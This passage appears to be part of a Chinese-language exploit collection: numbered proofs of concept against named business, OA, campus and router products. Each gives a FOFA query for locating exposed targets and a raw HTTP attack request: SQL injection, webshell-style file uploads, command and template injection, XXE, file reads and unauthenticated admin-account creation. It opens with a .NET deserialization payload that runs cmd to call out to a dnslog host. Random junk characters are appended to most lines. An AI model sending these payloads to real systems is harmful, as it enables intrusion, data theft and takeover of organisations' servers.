' B p# A s1 z l1 o" r9 x "storeID":{ b& U _0 E1 B" S- i4 q' x' {+ o
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",* g7 f. M. I; a5 h/ q
"MethodName":"Start",
! Z" x4 k0 k& O+ K# | "ObjectInstance":{
$ [: U5 z! V: {+ } "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",4 `1 W# @& z6 @/ V5 Z; X
"StartInfo": {
( }0 {, W9 t% s8 R$ {- k" J "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
' l" q& E2 F& w5 { "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"1 R# q" b7 b, {; k
}: b' t8 L2 [# d4 g1 U1 [
}
9 }7 ?/ p5 B: B2 p. ? }0 ?. }( k6 C5 k& r' D
}
# v4 l9 `( w; ` B/ G3 ~2 R. F; K% W( [7 d* v" X1 X
- l# q1 c5 w: s6 `2 A8 e57. 畅捷通T+ keyEdit.aspx SQL注入. g! d- ]; I3 @% B7 O
FOFA:app="畅捷通-TPlus"- z! z- v! }; m: ?+ T
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
$ I. c' o5 E8 t4 ]' SHost: host
( X/ n+ Z+ G$ R7 J$ `& S8 KUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36* n8 H7 O: a5 x5 _" t s
Accept-Charset: utf-8 D. S" A. B) d- M. {
Accept-Encoding: gzip, deflate
- p K3 M0 f/ N/ oConnection: close* y i, y o$ G; w' A5 [- o! P# B A
/ `# F1 B0 L; q0 y
( A' k3 H( c2 q" {
58. 畅捷通T+ KeyInfoList.aspx sql注入" B$ x5 o9 `2 D3 F
FOFA:app="畅捷通-TPlus"2 V4 U$ X- m2 S) \- m
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.14 ?1 h- `( P" I. p8 a$ F
Host: your-ip
5 g8 _& b/ C, p# v; VUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36$ |7 h& `0 w6 T2 u( `! p a$ E
Accept-Charset: utf-8* y, h9 i; u) U/ l0 h! n: @
Accept-Encoding: gzip, deflate( M( v$ V5 V! q- s% j: t t
Connection: close$ D/ n+ z; ~; p
7 \0 X; t5 s9 b7 I
; R- V' w. c6 C& z% Z59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
( k% i; R: y% {, v- U: _: e$ bFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"9 p7 n& i& G6 {, N" \
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
& ?3 s L5 [5 g4 S7 \) yHost: 192.168.86.128:9090) A8 c& X( i: e$ P$ @( g9 ]
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
3 R# I* w; n+ N9 oConnection: close% `/ c# M( w: k% i8 j" G r
Content-Length: 1669$ z4 s; E$ Y1 p
Accept: */*6 g0 H* B6 q, x$ j
Accept-Language: en
% h6 V* F1 T9 p: X: v8 [: XContent-Type: application/x-www-form-urlencoded7 w0 d. q& U) ~! f
Accept-Encoding: gzip
- r1 B' [# g# N1 i+ \+ D/ N! i6 C+ F6 g8 I8 h! s6 g
PAYLOAD9 @: J* y0 L0 o2 z0 }
8 ~$ A" i& m9 p( N
7 f0 Y5 K: V, S$ X. D& _$ z
60. 百卓Smart管理平台 importexport.php SQL注入
6 W9 s/ W/ U: u3 Y# RFOFA:title="Smart管理平台"* b; X0 y ?* u1 c& }$ D# I8 P
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1 i& m, D3 O" Y. J
Host:& t' ]" F E3 C. ]# i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; g/ L/ V# w0 C, M$ x3 u3 x9 q/ A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 f# n5 O4 p0 y8 kAccept-Encoding: gzip, deflate) H+ f( p6 ]) @( Y/ ]5 ]2 q
Accept-Language: zh-CN,zh;q=0.9
6 {! m' G" Z" w: ^( ^1 @! A3 OConnection: close: Z U% Z( I. l& l8 @9 M
& A. \4 a5 p" L/ f$ X) h c. b) y! l3 Q. Y
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
0 x4 g& \3 B. d2 o& `9 |1 D$ dFOFA: title="欢迎使用浙大恩特客户资源管理系统") S6 [8 l3 Q2 Z4 q
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
- f. V9 ]4 K5 w4 D/ I9 g0 sHost: x.x.x.x$ b- Q8 M" ?( P! l% v+ a3 \3 i. L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* S4 |2 n/ j0 fConnection: close
' ~( Q, K9 x+ ~1 H) bContent-Length: 27
4 P; h5 |2 y1 W; ]- v4 i# Q2 JAccept: */*# ^$ j! R& E& F0 l' R: D# G2 e4 O
Accept-Encoding: gzip, deflate
- I; y) q0 S( y( y8 c& mAccept-Language: en
6 ]# p( c% s7 D! v2 i5 GContent-Type: application/x-www-form-urlencoded
( \ V$ X" J" S8 Q, V6 U5 t# M
" f( `, Z- P2 l8 R7 |3 q5 `( d8uxssX66eqrqtKObcVa0kid98xa
( k8 K4 O+ b/ P- P. s, v4 J9 K: g
! `+ e& A* ?- g- c! w. V& ^1 u8 M7 j7 I' I
62. IP-guard WebServer 远程命令执行
. V9 f+ p/ r3 T/ KFOFA:"IP-guard" && icon_hash="2030860561"
: g$ `5 Z* B: {! Z$ L2 \GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
( B/ P! J% B- t! k9 qHost: x.x.x.x
& w8 Z& v; T; Q0 |# N" M9 U% ]4 J KUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
8 J9 t/ M9 G& Z, L YConnection: close; x2 W+ \( P; {1 U: x6 j& D0 u8 l/ F8 @- a
Accept: */*
8 t" K ~$ i1 Y1 MAccept-Language: en A0 n# Y1 z& q
Accept-Encoding: gzip) ]( K7 l% ?6 m3 w, z! R
7 N9 | z' F6 S. ?2 e. B: ~
8 v5 l$ M! w# f4 ?8 l" P
访问5 R) ]4 |) r- \% Z
$ s9 j7 e4 S) M8 a. G) _GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
# Y$ T! t8 W0 {1 F, ^4 J0 p. y; u1 `1 }Host: x.x.x.x- ]" I6 ~& k2 O& y' X$ W. C5 Z
4 R- I0 X) i# m$ T2 z/ s1 s. x) a# I" a! T
63. IP-guard WebServer任意文件读取- y, c& b$ T0 v1 a" r6 a
IP-guard < 4.82.0609.0
% J, u0 k4 T" \% X! X! I6 r" F# BFOFA:icon_hash="2030860561"8 _ P+ p/ ^& @$ Z7 E' R
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1+ ]. t; r) U1 k) ]. f
Host: your-ip* \ _" c1 [: @! q* Y/ J( y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
* c9 \* \2 e; MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* S5 s' W, i6 C P, {2 o( A% l
Accept-Encoding: gzip, deflate2 T3 y7 r) U6 D/ ?" L8 X& f
Accept-Language: zh-CN,zh;q=0.9) D- w3 {$ _* M
Connection: close
* M8 D# i$ Z# uContent-Type: application/x-www-form-urlencoded
. y \' C* o0 ?- E' j1 N3 d
" k, L& M( V3 F( ^& Xpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
) {% t8 U3 B" a0 c: o" |6 U2 P/ D0 _0 F+ W
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
9 x3 Y3 T% `# a' D( P) H, zFOFA:body="/Scripts/EnjoyMsg.js"
- Z; v9 G- w' q( U! OPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1: c8 y" S: S) w
Host: 192.168.86.128:90018 C' e2 l" b) W: C. c
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 d" q/ T* C; y
Connection: close: V- ^6 m1 r7 w5 N
Content-Length: 369, Z* U/ X( n4 c: a3 b: S( N, U
Accept: */*
' W" ]/ c2 ~2 m, D1 s- gAccept-Language: en" t7 n c2 r& Z6 }4 g
Content-Type: text/xml; charset=utf-8
P/ U1 \" @0 r" Y+ S0 QAccept-Encoding: gzip* Q0 X6 T) I$ D1 H4 ?
' E: _! `! I3 D$ i) r! t: |( G% x2 G
<?xml version="1.0" encoding="utf-8"?> z9 `! B! |' W. y0 q
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
! Y; r5 a- f1 e" Y3 f<soap:Body>
, t0 `" e8 J" p3 ?/ W ~ <GetOSpById xmlns="http://tempuri.org/">9 N+ Y% v9 e1 I5 U f; @/ w
<sId>1';waitfor delay '0:0:5'--+</sId>
1 ~' ]( z+ o) T' S$ i- x </GetOSpById>
: t0 F5 i: O1 y, N b# _0 J$ X# a </soap:Body>: c& T" f5 a& P
</soap:Envelope>5 `3 v7 H: F( a. R* e$ ~
1 \' x7 V) ], o2 u+ B; A
* d, y2 J1 \9 S4 V* V! i* w# }65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
/ ?+ P8 Z8 ?# Z: q2 mFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
& c! H+ k( n( V* ~5 F响应200即成功创建账号test123456/123456
. X5 T, M# m r# Y \POST /SystemMng.ashx HTTP/1.1* A! }. A) F" @- v3 |& R* n/ N) V
Host:& t9 K+ P3 A0 I
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
% I- e0 o, y6 ~2 ~% G4 n. C" a5 IAccept-Encoding: gzip, deflate
. L, p, |) i* h1 \: dAccept: */*
! p9 ~/ ~' y p: ?Connection: close
- a4 X2 I+ ^) }; G' PAccept-Language: en9 Q8 [4 q Y5 O. T& |3 T+ E0 A
Content-Length: 174& G( h3 _8 s" Q" g4 _* A6 a# y
4 |( O* B; |! P" t) _+ OoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators! y) ~7 J: G, K% m: Y2 [5 @
0 f x! w" [, ~" p) E
9 M z3 d4 _/ {2 w$ }+ h i% |7 C66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
6 F/ q7 B ~% f1 l$ [FOFA:app="万户ezOFFICE协同管理平台"" a( l; j+ a( V4 w3 \
, ?/ |% g) O1 h
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.11 }9 y4 y' c# K) n, U2 a
Host: x.x.x.x
" W8 @% o, i+ C. Z9 g% w0 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
3 Z( @" `% O6 P; dConnection: close' V8 A, N6 P- G0 v# O( Z
Accept: */*! j- M# \: z. O0 Q" [8 U# E# b
Accept-Language: en( u5 Z3 ?2 Y) p- w, f5 e
Accept-Encoding: gzip
" B5 x1 P1 k+ a ^4 a/ _2 X: T. w* V p( ^' z' U
- Q9 r9 k2 i1 C+ N( N! ] c% Z第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在0 `$ u! B3 [* z1 }8 i6 E
: {2 Q1 }/ d" S; W& W; C67. 万户ezOFFICE wpsservlet任意文件上传( u" b- B$ }( ~7 N% y; C+ k: w1 F
FOFA:app="万户网络-ezOFFICE"
0 i4 |# b0 [* R f9 K% u* YnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型# m& c( s, R. w5 ~
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
1 m, }) E. B& ?, c$ `* i% [7 }Host: x.x.x.x
3 g; h0 @) u! E! VUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0# O7 m" O# ]2 x7 p7 i, v
Content-Length: 173
' ` ?2 M8 K% n2 [# h) MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' P. j! d: A8 N9 R# c
Accept-Encoding: gzip, deflate8 X+ v2 O0 U! D5 V# Y- M8 L* x
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.32 u* Z9 c: i$ _* `; K
Connection: close" n" r' Y% b# [' z
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp# ~ M1 \6 A* k+ T# N
DNT: 15 h+ i! W! O/ ], x" e |
Upgrade-Insecure-Requests: 1
& d- u$ `3 |, B$ y
" e# L& T* C. R7 e- @ ^. ^+ Z--ufuadpxathqvxfqnuyuqaozvseiueerp, J0 G4 z) \6 ?7 E+ H( W( g
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
. m" @" _5 ?; l8 I9 K3 `/ N; i( F9 s. G1 D, v6 ~
<% out.print("sasdfghjkj");%>
: p) y- H4 q/ s5 r--ufuadpxathqvxfqnuyuqaozvseiueerp--
: V9 }0 \; P0 k4 y! u! i2 U% v7 T
" ?$ b9 j/ b& ?
- u5 }- x) H4 E文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
2 P L3 H# o }; |" D& j w) N4 M
: ?, x+ K% X1 F: j, ]6 ^68. 万户ezOFFICE wf_printnum.jsp SQL注入* i ^. ~0 Y6 V8 j8 @' f; V, S. Y
FOFA:app="万户ezOFFICE协同管理平台"
9 L3 U l+ |( B% p1 i. G6 EGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
& D+ c, t, E, B$ D; vHost: {{host}}% K" M, J& F" x3 P5 Q# Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
" T {+ c: \/ N1 U' S |- `. @Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.85 V* z5 M/ @' ~% b+ Y! Z1 {
Accept-Encoding: gzip, deflate
( i: o( a/ e4 W, F, ?; B6 T4 t: NAccept-Language: zh-CN,zh;q=0.9" c5 m* I7 K* H0 Q
Connection: close6 M. s( e& C2 j- Q0 x# s+ t
! z# |& A$ ~" C
3 b/ [6 B* f2 J C7 x* @69. 万户 ezOFFICE contract_gd.jsp SQL注入
- ]" H, s/ e$ U3 {FOFA:app="万户ezOFFICE协同管理平台"! \4 c% s1 g1 Q% ]$ y4 z
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
& n: V1 h; x I: Q1 kHost: your-ip1 |2 C! h) M) N7 l
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
1 n& O" o: B, X% k' pAccept-Encoding: gzip, deflate5 k! z7 d% _- l; v
Accept: */** p$ s" m3 E6 G: S$ Q# \
Connection: keep-alive7 I7 E6 u, }0 A
5 x/ b% ?$ L( L' c: I( i2 X
9 r' h6 T" z0 u3 ^7 E1 ~; O70. 万户ezEIP success 命令执行
( V) `: M, P# w7 v+ K" T3 [0 EFOFA:app="万户网络-ezEIP" s W( h3 @& [& ]* \
POST /member/success.aspx HTTP/1.1
n) J6 d% n8 ~Host: {{Hostname}}5 K9 Z% u5 c& j$ b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.362 P# e. H: H1 R! [. V
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
: {4 a: f) ?' @/ eContent-Type: application/x-www-form-urlencoded
' c" u0 C2 S& p% X+ S8 ~: nTYPE: C
, l- v5 P" e5 g, @Content-Length: 16702' T4 a& @8 l5 J2 s7 Z
' J) |0 @- f; ]5 ^* O0 m J
__VIEWSTATE=PAYLOAD! d4 t8 u, p4 E$ g
6 c) W6 |* j5 t G
1 C( u1 k$ z8 m/ ^( y B& X/ H1 O7 f
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
. x( B, {/ C. gFOFA:body="PM2项目管理系统BS版增强工具.zip"% k- W) N/ T! Q8 S2 u6 G3 g1 s
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
% @& M* K# l n/ X3 nHost: x.x.x.xx.x.x.x2 p- H9 T! g7 A p
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
+ Q$ S J0 B; P' B! {& w. bConnection: close5 f- n$ A9 I" F( ^% |4 K8 d9 {& ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 u) M2 w9 e. M* YAccept-Encoding: gzip, deflate; y7 Z) |1 |: k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* g( K% @" C% N" V( Z
Upgrade-Insecure-Requests: 1" d; I5 C7 b, b
% n+ {6 _3 R( b% o/ j% r2 L0 Q
6 A, w2 O" u+ |+ p( G" R
72. 致远OA getAjaxDataServlet XXE( ]9 {+ [1 D* K0 w/ x# t
FOFA:app="致远互联-OA"/ h. n, W( X) x( U
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1$ M0 u8 o) X1 E9 ?
Host: 192.168.40.131:8099" H9 Q9 a! }; i
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
; m( A+ r* e6 D) `2 h, G c5 zConnection: close
. A. f3 \+ O& `Content-Length: 583
" ]9 R# v6 P% {7 {; G8 bContent-Type: application/x-www-form-urlencoded
4 o4 R6 I8 [# O: L& u" JAccept-Encoding: gzip
, T+ f; V, t( q8 J8 K, o. }2 s* B9 e" C) N2 c! b# [6 A% r
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E! c8 `1 [$ p+ e$ ?
7 m' x: A7 S+ w3 D& {: c3 [
( Y. }; ^3 K" h0 z- ~* v73. GeoServer wms远程代码执行% x6 w. {# E+ q$ K/ y6 p
FOFA:icon_hash=”97540678”
6 l: \* D: N; h3 F# d1 OPOST /geoserver/wms HTTP/1.12 |* B# [8 B. f+ y2 Z
Host:6 I. e/ ^/ p" w5 n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
/ k" O2 `7 C$ y/ MContent-Length: 1981
. ~2 `4 E1 S& m/ YAccept-Encoding: gzip, deflate I4 v$ Y# n5 _( ]# b; \! h
Connection: close8 k0 U" J. V* {, B k: P
Content-Type: application/xml
9 Z# @0 @% d) C, X: Y" h; Q7 u: I# T4 U! TSL-CE-SUID: 3
6 i3 l8 f' k/ {) Z9 O2 u0 o0 g$ \; i; T" Q, o
PAYLOAD. y6 J# R% J# y6 b0 x; V
& ]) D3 J- w, E2 J- y0 q* R. j# Z7 Q
74. 致远M3-server 6_1sp1 反序列化RCE, T3 k5 p8 l4 ~ O
FOFA:title="M3-Server"
9 w' s7 v$ d9 s8 B, G! Q* SPAYLOAD( F! G; _; D$ Z3 I/ h }* {
' h, z; V, o7 `& g% `75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE* q7 E n: |( {. q- R
FOFA:app="TELESQUARE-TLR-2005KSH"
3 o1 F/ H, K# K: ^GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
( D0 F! m+ P2 }' |2 Z- o6 E) A4 NHost: x.x.x.x M' o/ l: W4 {. a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 y x# C. d* W; B
Connection: close/ d7 c0 k: _2 x. D3 Y8 j
Accept: */*2 h% V, ~0 Y' Q }4 G5 Q
Accept-Language: en$ [4 D% F* C) B8 f1 w- @
Accept-Encoding: gzip5 |' Z: @# x9 `
" F! g2 R2 g$ X& A" R" i5 b/ s% U( W- M# {7 U1 M/ V; B
GET /cgi-bin/test28256.txt HTTP/1.1
1 |9 z' T1 `+ iHost: x.x.x.x
/ x g' k8 t/ d6 m# {+ H$ r- @: r. }5 M; f5 d A$ @
8 e# h# w2 K v& _% o9 d( T
76. 新开普掌上校园服务管理平台service.action远程命令执行" c+ E: Z1 C" D2 S5 C
FOFA:title="掌上校园服务管理平台"
! S' z! y5 q6 ?- TPOST /service_transport/service.action HTTP/1.1
; n2 i4 |, a3 JHost: x.x.x.x% b- I' ^7 ~0 }0 O3 N) [9 W) Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0" f4 l1 r4 _7 o7 g) {1 @0 w
Connection: close2 k: U. u7 _: f3 o1 ]$ u2 `
Content-Length: 211
2 Y5 k' Y [ H/ x5 }& l6 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 a# C. K7 o. T/ z& V+ F5 a/ i; s
Accept-Encoding: gzip, deflate
) H6 @* S9 |0 w9 zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% ^! p- S- O+ p1 S3 z4 a( P( zCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
; t2 u8 v! ?4 m; m( ]5 E# H! ]Upgrade-Insecure-Requests: 1
5 V' s% o6 e. U$ f2 ?, n- z. e# g) R& `: B& |
{$ q! F1 X" Q( b* m# {
"command": "GetFZinfo",
2 G% t' q0 A3 I) E "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"' W! s* h4 t1 o# q4 U2 \
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"# p; g7 C8 c6 x* i: [, u3 G
}4 _% C& R0 v! [
0 L' x8 i b) I N! O
- W, g. D, G/ R$ d/ o/ nGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1% X8 D" l' ^% m! q2 x
Host: x.x.x.x
) E: p w6 H, j- v
5 \# z: {+ w2 e3 g$ o" S- |" b1 |) H$ C8 A! j' n# i9 Q
* t) N1 d5 t1 K- k4 F7 K
77. F22服装管理软件系统UploadHandler.ashx任意文件上传) j. c' ]7 O" o7 ]- O
FOFA:body="F22WEB登陆"
+ v6 r. C0 X! V" N; z9 zPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
9 b! H, w9 a' l# V x! lHost: x.x.x.x) B5 o, s: n" z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 `6 C6 d2 e [- s# X) e7 ?4 e
Connection: close6 [! j$ j8 G* e3 x9 W
Content-Length: 433# D/ \5 R; y( g9 Z0 j
Accept: */*
/ V& n+ z! D" D7 ^" T8 L, m% `( vAccept-Encoding: gzip, deflate
( X9 p" J" ]/ f# t$ tAccept-Language: zh-CN,zh;q=0.93 U6 c# ]6 O, K3 G, r
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
( _& d& u! X/ H# |3 g0 q! c6 Q3 Q! J) k% J5 o) s
------------398jnjVTTlDVXHlE7yYnfwBoix
' E% }( a1 c% ^1 y9 wContent-Disposition: form-data; name="folder"8 U& V9 w, I/ J
g4 Y2 ?4 t9 i8 ~ Y1 K8 c
/upload/udplog3 x$ D9 @9 f9 t h+ t' k( q
------------398jnjVTTlDVXHlE7yYnfwBoix
7 Z$ W, h3 C4 j7 T0 @5 [. QContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
7 X( Q2 r" A7 hContent-Type: application/octet-stream- g k8 P1 T3 ~7 {$ M9 v6 j
4 I3 j. W# E3 {. Y/ Y( @) uhello1234567# Y( }9 M6 i7 @2 m \( i
------------398jnjVTTlDVXHlE7yYnfwBoix
+ p; X& p* \1 Y' D( S8 vContent-Disposition: form-data; name="Upload"
/ h$ P* k, ^3 |5 B" N+ x& I) t y8 M! W0 v) n5 X
Submit Query8 S7 ~- `. ^ {1 J/ K2 K( {' F, F
------------398jnjVTTlDVXHlE7yYnfwBoix--) ^) Z5 x% \# s& S0 l
' N' a$ s/ ~# |1 d6 o$ R
7 X( W& F# v2 j, u; k H78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
# n- o3 }6 R2 rFOFA:icon_hash="2001627082"& i$ P% e1 x" I" I+ d O9 j
POST /Platform/System/FileUpload.ashx HTTP/1.1* I1 l& }7 x8 a/ B& W
Host: x.x.x.x
( e* Z @, q$ x8 s& U" lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ K4 p" s2 o5 ^# [# t2 l. S: J9 AConnection: close
1 ^5 s- @2 \# B/ H* YContent-Length: 336
( B+ l0 a) R0 _' V& C; ^' C W+ TAccept-Encoding: gzip
! L. @* j3 l! m9 nContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l7 P9 E# k* i7 A* J; f. F: } ]' e8 I
# B. \! K# t/ H3 H. c; Y& [
------YsOxWxSvj1KyZow1PTsh98fdu6l7 l4 R2 `# e2 O# J6 ]
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"8 W/ V' O, g1 b ^' A6 l9 z8 T
Content-Type: image/png
2 Y) k# ?6 Q8 A% O# b3 L! {! b) Y; t5 ^% b2 W0 s3 u
YsOxWxSvj1KyZow1PTsh98fdu6l3 r' k; p, f" `( {" H
------YsOxWxSvj1KyZow1PTsh98fdu6l
( ?6 Q' J1 L9 c5 ] @3 ]Content-Disposition: form-data; name="target"# L7 E4 i& x4 ^4 D
& u4 Z$ c ]1 m/Applications/SkillDevelopAndEHS/
~( g( r- D( i------YsOxWxSvj1KyZow1PTsh98fdu6l--
$ M& {5 m( {, r4 J( E
( ~: d9 I/ q$ y5 ^3 ~ @3 h' b, m/ r- L+ `4 n
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1+ o' |: p) @9 `' v& p0 L7 B* k
Host: x.x.x.x
8 P6 q1 ? G) h. W
